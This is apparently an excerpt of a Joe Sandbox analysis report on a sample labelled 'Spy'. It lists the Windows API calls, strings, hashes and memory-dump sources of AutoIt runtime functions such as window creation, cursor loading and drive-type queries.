                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
                                                      • Instruction ID: 2871afd0d1ea0291c86677ecf8450749538d34708276429bb49449e1a896046c
                                                      • Opcode Fuzzy Hash: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
                                                      • Instruction Fuzzy Hash: A6129C31604201EFDB25EF24C884FE9BBB9BF08721F548569E495CB262CB71ED81CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 2660009612-1645009161
                                                      • Opcode ID: a4f84a96eee2a793e4f660a9de55c6431e1977fea6382900dd086a948b13cff1
                                                      • Instruction ID: c9b3b5182aaed591879e55c987b62cecb946e5c7a486a5ad104d1202b6b238b3
                                                      • Opcode Fuzzy Hash: a4f84a96eee2a793e4f660a9de55c6431e1977fea6382900dd086a948b13cff1
                                                      • Instruction Fuzzy Hash: 37A18931B00209BBCF24AF61DE92FAE37F9AF45B40F104069F905AB292EB719E51D750
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00AF7BC8
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AF7C87
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AF7CC5
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AF7CD7
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AF7D1D
                                                      • GetClientRect.USER32(00000000,?), ref: 00AF7D29
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AF7D6D
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AF7D7C
                                                      • GetStockObject.GDI32(00000011), ref: 00AF7D8C
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00AF7D90
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AF7DA0
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF7DA9
                                                      • DeleteDC.GDI32(00000000), ref: 00AF7DB2
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AF7DDE
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AF7DF5
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AF7E30
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AF7E44
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AF7E55
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AF7E85
                                                      • GetStockObject.GDI32(00000011), ref: 00AF7E90
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AF7E9B
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AF7EA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: e0f457c391cc9530bd42e596be0a835369e8b96f5c34284be5fce8249251012f
                                                      • Instruction ID: 82f24ce6b36eb959efe7282ec7d40e0236b2b32ffa10f3af7059aa1028cd10d3
                                                      • Opcode Fuzzy Hash: e0f457c391cc9530bd42e596be0a835369e8b96f5c34284be5fce8249251012f
                                                      • Instruction Fuzzy Hash: D8A185B1A50219BFEB14DBA4DD4AFAE77B9EB05710F008114FA15A72E0DBB0AD41CF60
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00AEB361
                                                      • GetDriveTypeW.KERNEL32(?,00B12C4C,?,\\.\,00B10980), ref: 00AEB43E
                                                      • SetErrorMode.KERNEL32(00000000,00B12C4C,?,\\.\,00B10980), ref: 00AEB59C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: e5532da2fa1e258f21d99ab3df6d90dcf5f1bc30737dde0d6f6c3e073477345b
                                                      • Instruction ID: 4f7a6a2a3d0ed308edb88c4479b17b6f605fa0690d9eebca24c13649feb0ee66
                                                      • Opcode Fuzzy Hash: e5532da2fa1e258f21d99ab3df6d90dcf5f1bc30737dde0d6f6c3e073477345b
                                                      • Instruction Fuzzy Hash: 81517430B6425AEBCB00EB62CA4AD7E77F0EB44740F344156E507A72A1DB71AE41CB71
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B0A0F7
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B0A1B0
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B0A1CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 61a5b68d2d3f00b51492db18d1e099f8fa2cb827c8922c9141d01fa732c2c807
                                                      • Instruction ID: c5a6ccf8254d4483ff26d8247af4acff6fd3a5df90e037060b487a0fad2c2989
                                                      • Opcode Fuzzy Hash: 61a5b68d2d3f00b51492db18d1e099f8fa2cb827c8922c9141d01fa732c2c807
                                                      • Instruction Fuzzy Hash: 2E02BB30108301AFDB25CF14C888BAABFE5FF95714F048AA9F995972E1CB75D944CB92
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00B0AF51
                                                      • SetTextColor.GDI32(?,?), ref: 00B0AF55
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
                                                      • GetSysColor.USER32(0000000F), ref: 00B0AF76
                                                      • CreateSolidBrush.GDI32(?), ref: 00B0AF7B
                                                      • GetSysColor.USER32(00000011), ref: 00B0AF93
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
                                                      • SelectObject.GDI32(?,00000000), ref: 00B0AFB2
                                                      • SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
                                                      • SelectObject.GDI32(?,?), ref: 00B0AFC8
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B0B05F
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B0B086
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00B0B0A4
                                                      • DrawFocusRect.USER32(?,?), ref: 00B0B0AF
                                                      • GetSysColor.USER32(00000011), ref: 00B0B0BD
                                                      • SetTextColor.GDI32(?,00000000), ref: 00B0B0C5
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B0B0D9
                                                      • SelectObject.GDI32(?,00B0AC1F), ref: 00B0B0F0
                                                      • DeleteObject.GDI32(?), ref: 00B0B0FB
                                                      • SelectObject.GDI32(?,?), ref: 00B0B101
                                                      • DeleteObject.GDI32(?), ref: 00B0B106
                                                      • SetTextColor.GDI32(?,?), ref: 00B0B10C
                                                      • SetBkColor.GDI32(?,?), ref: 00B0B116
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: 3f89b438cefc5e6d7bbc2e6ca12089aefcca59666e268d7795005a0a31f65620
                                                      • Instruction ID: a7d4ce77543014a0b156f10b821ae3b76ec6ea42996faa239e4190f23a563527
                                                      • Opcode Fuzzy Hash: 3f89b438cefc5e6d7bbc2e6ca12089aefcca59666e268d7795005a0a31f65620
                                                      • Instruction Fuzzy Hash: C6613B71910219BFDB11AFA4DC48EEE7BB9EB08320F108555F915AB2E1DBB59980CF90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B090EA
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B090FB
                                                      • CharNextW.USER32(0000014E), ref: 00B0912A
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B0916B
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B09181
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B09192
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B091AF
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00B091FB
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B09211
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B09242
                                                      • _memset.LIBCMT ref: 00B09267
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B092B0
                                                      • _memset.LIBCMT ref: 00B0930F
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B09339
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B09391
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00B0943E
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00B09460
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094AA
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094D7
                                                      • DrawMenuBar.USER32(?), ref: 00B094E6
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00B0950E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: 994009b92f70d1eec0e8ab101fd6a2bd4c8eec7332bb53af73faf95aed00ee03
                                                      • Instruction ID: 42463776398d9117926677a1a593c9c63de6cbc95298c955442971c0895fd75f
                                                      • Opcode Fuzzy Hash: 994009b92f70d1eec0e8ab101fd6a2bd4c8eec7332bb53af73faf95aed00ee03
                                                      • Instruction Fuzzy Hash: 2CE16C71904209AEDF219F55CC84EEE7FB8EF09710F508196F915AB2D2DB708A81DF61
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00B05007
                                                      • GetDesktopWindow.USER32 ref: 00B0501C
                                                      • GetWindowRect.USER32(00000000), ref: 00B05023
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00B05085
                                                      • DestroyWindow.USER32(?), ref: 00B050B1
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B050DA
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B050F8
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B0511E
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00B05133
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B05146
                                                      • IsWindowVisible.USER32(?), ref: 00B05166
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B05181
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B05195
                                                      • GetWindowRect.USER32(?,?), ref: 00B051AD
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00B051D3
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00B051ED
                                                      • CopyRect.USER32(?,?), ref: 00B05204
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00B0526F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: d72afd887108d59d8aaef0d00b9af28c0177d123599115896a29e8e091518db9
                                                      • Instruction ID: f2f327beeb3e02acc94ff6c0bf0a2ccbf49ffdaf8419b5b9d171237cf54e2834
                                                      • Opcode Fuzzy Hash: d72afd887108d59d8aaef0d00b9af28c0177d123599115896a29e8e091518db9
                                                      • Instruction Fuzzy Hash: FCB18870604701AFD714EF64C988B6BBBE5FF88310F008A58F9999B291DB71E845CF92
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AE499C
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AE49C2
                                                      • _wcscpy.LIBCMT ref: 00AE49F0
                                                      • _wcscmp.LIBCMT ref: 00AE49FB
                                                      • _wcscat.LIBCMT ref: 00AE4A11
                                                      • _wcsstr.LIBCMT ref: 00AE4A1C
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AE4A38
                                                      • _wcscat.LIBCMT ref: 00AE4A81
                                                      • _wcscat.LIBCMT ref: 00AE4A88
                                                      • _wcsncpy.LIBCMT ref: 00AE4AB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: be70b539c353652ce3569bd00c7437813ef20c9570545f7e1b29f1d70d4c43fb
                                                      • Instruction ID: 07258db11f5a74668cefa9ca15a40e9a4c9884e3bcb35f67affb2346eb44ca9d
                                                      • Opcode Fuzzy Hash: be70b539c353652ce3569bd00c7437813ef20c9570545f7e1b29f1d70d4c43fb
                                                      • Instruction Fuzzy Hash: 3D410472A002047EEB10B7658E47EBF7BBCEF46360F104069FA04A71D2EB74DA5197A5
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82C8C
                                                      • GetSystemMetrics.USER32(00000007), ref: 00A82C94
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82CBF
                                                      • GetSystemMetrics.USER32(00000008), ref: 00A82CC7
                                                      • GetSystemMetrics.USER32(00000004), ref: 00A82CEC
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A82D09
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A82D19
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A82D4C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A82D60
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00A82D7E
                                                      • GetStockObject.GDI32(00000011), ref: 00A82D9A
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A82DA5
                                                        • Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
                                                        • Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                        • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                        • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                      • SetTimer.USER32(00000000,00000000,00000028,00A813C7), ref: 00A82DCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: d5b8b280354c076375934a092bd438ce411d3a6b923f826e2c8f9ffbe12ca271
                                                      • Instruction ID: c62c76d24a0beb02a17b3f8041106b8cd47ad28b1556bc0114204867606ebdb0
                                                      • Opcode Fuzzy Hash: d5b8b280354c076375934a092bd438ce411d3a6b923f826e2c8f9ffbe12ca271
                                                      • Instruction Fuzzy Hash: 8DB16C75A4020A9FDB14EFA8DD89BFD7BB5FB08310F108129FA15E7290DB74A950CB54
                                                      APIs
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      • GetForegroundWindow.USER32(00B10980,?,?,?,?,?), ref: 00AA04E3
                                                      • IsWindow.USER32(?), ref: 00AD66BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$Foreground_memmove
                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                      • API String ID: 3828923867-1919597938
                                                      • Opcode ID: 70f2f5ce8d2edf0e8ed4f39c15cd4905d900bbd5790fed434cd10b0627417510
                                                      • Instruction ID: e9d9ac8b92305c3b7b74a858febd5e08d79130f78ffe99a490b832193449c4b4
                                                      • Opcode Fuzzy Hash: 70f2f5ce8d2edf0e8ed4f39c15cd4905d900bbd5790fed434cd10b0627417510
                                                      • Instruction Fuzzy Hash: 59D1B531204706DFCB08EF20C6819AABBF5BF55344F604A1AF496576A2DF30F999CB91
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00B044AC
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B0456C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 3974292440-719923060
                                                      • Opcode ID: 57ba86451c1617544bc3da62493b671bd7ace60942defe391f497523cea60977
                                                      • Instruction ID: 9452a041ce89390b2fd2784eb88108e8a9a3c1b6c4af1d8defd8980c8e1be483
                                                      • Opcode Fuzzy Hash: 57ba86451c1617544bc3da62493b671bd7ace60942defe391f497523cea60977
                                                      • Instruction Fuzzy Hash: D3A180712142019FCB14FF60CA91A6AB7E5EF99314F2089A8F9569B3E2DF30EC05CB51
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00AF56E1
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00AF56EC
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00AF56F7
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00AF5702
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00AF570D
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00AF5718
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00AF5723
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00AF572E
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00AF5739
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00AF5744
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00AF574F
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00AF575A
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00AF5765
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00AF5770
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00AF577B
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00AF5786
                                                      • GetCursorInfo.USER32(?), ref: 00AF5796
                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00AF57C1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
